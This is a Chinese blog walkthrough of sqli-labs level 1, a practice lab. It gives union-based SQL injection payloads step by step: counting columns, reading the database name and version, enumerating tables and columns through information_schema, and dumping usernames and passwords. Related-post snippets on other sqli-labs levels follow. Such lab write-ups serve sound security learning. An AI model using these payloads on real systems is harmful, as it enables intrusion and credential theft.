SQL注入——sqli-labs 第一关

最新推荐文章于 2024-05-28 13:45:13 发布

lizhi_xx

最新推荐文章于 2024-05-28 13:45:13 发布

阅读量378

点赞数 10

文章标签： sql 数据库安全 web安全

本文链接：https://blog.csdn.net/lizhiiiii/article/details/135898947

版权

一、判断一下是否存在SQL注入

可以判断出来sql语句是字符型而且存在sql注入漏洞，页面有回显则我们可以使用联合查询

二、开始联合注入

1、首先我们查询一下表有几列

?id=1'order by 3 --+

得出来有三列

2、看一下显示位是哪个

?id=-1'union select 1,2,3--+

由此我们可查询数据库名称以及版本号

3、开始查询

?id=-1'union select 1,database(),version()--+

然后我们查询该数据库下的table表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

然后我们找到user表了之后我们在user表里的所有列的信息

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

至此，我们得到两个敏感字段就是username和password，然后我们就可以得到每个用户名对应的密码（防止分不清用户名密码在username和password中间加了个id）

?id=-1' union select 1,group_concat(username ,id , password),3 from users--+

即此次SQL注入成功

优惠劵

lizhi_xx

关注关注

10
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
SQL注入——sqli-labs 第一关

可以判断出来sql语句是字符型而且存在sql注入漏洞，页面有回显则我们可以使用联合查询。
复制链接

扫一扫

SQL注入——sqli-labs第五关

lizhiiiii的博客

01-29

550

使用floor报错语句注入

SQL注入——sqli-labs第二十四关

lizhiiiii的博客

02-01

520

这一关我们使用二次注入，因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。

参与评论您还未登录，请先登录后发表或查看评论

SQL注入——sqli-labs-Less-9时间盲注

m0_63563528的博客

04-06

532

时间盲注和 Bool 盲注很像，区别就是 “参照物” 的不同

SQL注入之sqli-labs

m0_60716947的博客

04-08

7168

目录（一）搭建 sqli-labs 靶场（二）sqli-labs的第一关至第四关笔记（1）第一关 sqli-labs 是一款基于 sql 注入的游戏教程，有利于更好地了解 sql 注入的语法。（一）搭建 sqli-labs 靶场搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接：https://www.xp.cn 要保证安装路径中不能有空格和中文。下载完成后：可以对 root 数据库进行修改密码或创建数据库，然后在软件管理..

详细sqli-labs（1-65）通关讲解

热门推荐

dreamthe的博客

05-17

12万+

如果刚开始接触sql注入，那么sqli-labs这个靶场会很适合你，里面包含了很多的情景，以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ...

二次注入——sqli-labs第24关

这是笔者初学时所做的笔记，有错误的地方太多了，有些结论也只是笔者的一家之言。请自行判断

08-02

3542

首先，选择注册盲猜有个admin的账号，所以注册一个admin '#的账号。密码是12345 （上帝视角）此时admin的密码是admin 登录然后为admin '#修改密码为123 修改成功（此时真的是修改admin '#的密码吗）（又一次上帝视角）此时admin的密码成了123，而admin '#的密码并没有重置这就是二次注入：原理就是php把…………………… sql……………… 至于为什么会有 ...

表单注入——sqli-labs第11~16关

这是笔者初学时所做的笔记，有错误的地方太多了，有些结论也只是笔者的一家之言。请自行判断

07-28

1750

1、观察是post还是get 可以看url的变化，或者看源码 xxxx’ order by 10# ’ order by 2#

SQL注入篇——sqli-labs最详细1-40闯关指南

爱国小白帽

01-11

3万+

使用sqlilabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less1进入第一关，在网址中添加标红内容，显示了用户和密码 http://localhost/sqlilabsmaster/Less1/index.php?id=1’ and 1=1 把1=1改成1=2，不报错也不显示任何信息，说明可以利用 ’ 字符注入二.进入第二关，在网址中添...

sql注入及sqli-labs靶场前几关讲解

m0_70483044的博客

01-09

1808

sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中，再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的"数据"拼接到SQL语句中，被当作是SQL语句的一部分执行，从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端，前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。

SQL注入天书 sqli-labs

01-11

SQL注入天书 sqli-labs

sqli-labs-master靶场安装下载

04-01

安装phpstudy、sqli-labs 适合人群：小白安装sqli-labs报错如何解决

sqlilabs过关手册注入天书，过关sqlliabs的绝佳手册

06-28

Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装将之前下载的源码解压到web目录下，linux的apache为 /var/www/html下，windows下的wamp解压在www目录下。修改sql-connections/db-creds.inc文件当中...

jeakinscheung-sqli-labs-php7-master.zip

03-16

sqli创建数据库连接发现连接不了，这种原因是现在大部分人用的php7，原版的sqli只支持php5.

windows环境下安装sqli-labs

11-04

windows server 2012 环境下，安装sqli-labs的详细教程，适合新手小白，大神可以参考一下，有不足的地方请联系我。

PostgreSQL和GaussDB对比

lee_vincent1的博客

05-22

910

PostgreSQL是一个功能强大、社区活跃的开源关系型数据库，适用于各种应用场景。它具有良好的扩展性和兼容性，是许多企业的首选数据库之一。GaussDB在 PostgreSQL 的基础上进行了大量增强，特别是面向企业级应用的优化和分布式架构，使其更加适应大规模、高并发和高可靠性的业务需求。华为提供的商业支持和定制服务也使其成为企业级数据库解决方案的有力竞争者。选择 PostgreSQL 还是 GaussDB 取决于具体的业务需求、预算和技术支持要求。

读后感：《SQL数据分析实战》运营SQL实用手册

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交